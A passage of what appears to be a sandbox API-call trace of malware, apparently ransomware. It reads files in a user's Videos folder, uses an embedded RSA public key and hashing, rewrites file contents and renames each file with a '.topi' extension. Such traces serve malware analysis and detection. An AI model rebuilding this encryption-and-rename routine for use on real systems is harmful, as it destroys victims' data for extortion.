(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5048 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5060 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5030 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5048 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbb18 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.895] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xa82f, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xa82f, lpOverlapped=0x0) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.895] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa834, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.895] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.896] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.896] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.896] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.896] CloseHandle (hObject=0x6a8) returned 1 [0097.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0097.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x31cf750 [0097.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.898] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Qk-VAoV_f.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\qk-vaov_f.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Qk-VAoV_f.swf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\qk-vaov_f.swf.topi")) returned 1 [0097.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.899] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.900] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a4bd00, ftCreationTime.dwHighDateTime=0x1d5b793, ftLastAccessTime.dwLowDateTime=0x237333d0, ftLastAccessTime.dwHighDateTime=0x1d5b5dd, ftLastWriteTime.dwLowDateTime=0x237333d0, ftLastWriteTime.dwHighDateTime=0x1d5b5dd, nFileSizeHigh=0x0, nFileSizeLow=0xdf2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rK5h.flv", cAlternateFileName="")) returned 1 [0097.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f248 [0097.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f248 | out: hHeap=0x680000) returned 1 [0097.900] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\rK5h.flv") returned=".flv" [0097.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\rK5h.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\rk5h.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.900] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=57133) returned 1 [0097.900] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.903] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xdf07, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.904] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.904] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.904] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xdf2d, lpOverlapped=0x0) returned 1 [0097.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.905] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.906] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.906] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.906] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.906] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.906] GetLastError () returned 0x0 [0097.906] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.906] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.906] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.906] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.906] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xdf30) returned 0x9a06a00 [0097.907] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbb18 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5000 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbb60 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5048 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5060 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.907] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5048 | out: hHeap=0x680000) returned 1 [0097.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5060 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5048 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5048 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.908] GetCurrentThreadId () returned 0x8c4 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa610 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.908] GetCurrentThreadId () returned 0x8c4 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 